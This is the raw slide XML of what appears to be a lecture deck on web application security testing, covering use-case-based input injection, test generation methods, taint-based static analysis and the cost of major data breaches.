              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2750">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="505459" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>response‐based method </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>fails </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>reach</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-370" dirty="0"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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>inner  logics </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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programs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2750">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="1109980" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc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  <a:tab pos="3517265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>case‐based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="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method	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>alleviate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-29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limitation  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(McAllister</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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2008)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="2245"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Relies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-12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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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perform</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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functionalities</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="2375"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Generates</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-130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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-120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collection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-11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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="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user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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(or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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URLs)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="5080" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-65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inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-110" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>replayed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>back</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15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malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-80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injected  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>specific points </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-300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URLs</a:t>
            </a:r>
            <a:endParaRPr sz="2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026155" y="616711"/>
            <a:ext cx="425894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0" dirty="0"/>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>(cont.)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48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1222502" y="1230806"/>
            <a:ext cx="4034154" cy="1936114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71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55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>case </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-26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method</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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509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10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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signature</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="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480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trike="sngStrike" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mutation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike" dirty="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480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Static</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-11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analysis</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="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480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10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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randomization</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="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986276" y="616711"/>
            <a:ext cx="231648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Static</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>analysis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49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93902" y="1105916"/>
            <a:ext cx="6591300" cy="1183640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="22606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178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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Identify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-45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vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>analyzing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>source code</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="168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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Do not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>execute program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35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code</a:t>
            </a:r>
            <a:endParaRPr sz="24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385314" y="616711"/>
            <a:ext cx="513842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Impact </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>vulnerability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93902" y="1453387"/>
            <a:ext cx="4070350" cy="1143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indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2530"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on leading</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-240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websites</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="2055"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84210"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Target </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(70 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>million</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-12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users)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84210"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Adobe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(38 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>million</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-204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users)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="2165"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84210"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Living </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Social (&gt; 50 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>million</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-16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users)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constant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93902" y="3743960"/>
            <a:ext cx="7232650" cy="2910840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="113665" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="287020" marR="1390015" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="895"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Breaches</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-125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of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>systems</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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resulting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-100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data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-100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theft</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-13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and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-90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interruption</a:t>
            </a:r>
            <a:endParaRPr sz="22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buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2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lr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2350">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" marR="1237615" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Cost</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-1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cyber</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15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crime</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-80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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-100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2013</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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US</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-60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economy  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>alone </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>was more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>than $100 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>billion </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and $300  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>billion</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-105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globally</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="622300" marR="5080" indent="-635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://info.cenzic.com/rs/cenzic/images/Cenzic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>‐Application‐Vulnerability‐  Trends‐Report‐2013.pdf</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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764018" y="1441704"/>
            <a:ext cx="1130808" cy="84886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922514" y="2667000"/>
            <a:ext cx="966977" cy="74447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955280" y="3881627"/>
            <a:ext cx="939546" cy="94030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9094216" y="6805633"/>
            <a:ext cx="135890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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:fld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524760" y="632713"/>
            <a:ext cx="4857115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00" spc="-15" dirty="0"/>
              <a:t>Static </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-10" dirty="0"/>
              <a:t>analysis: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-50" dirty="0"/>
              <a:t>Tainted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-20" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-15" dirty="0"/>
              <a:t>flow</a:t>
            </a:r>
            <a:endParaRPr sz="290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50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93902" y="1384808"/>
            <a:ext cx="7391400" cy="26200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983615" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15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variables</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>marked</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-75" dirty="0"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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>tainted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-3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their </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="240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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>propagations </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-19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tracked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3500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Warnings </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
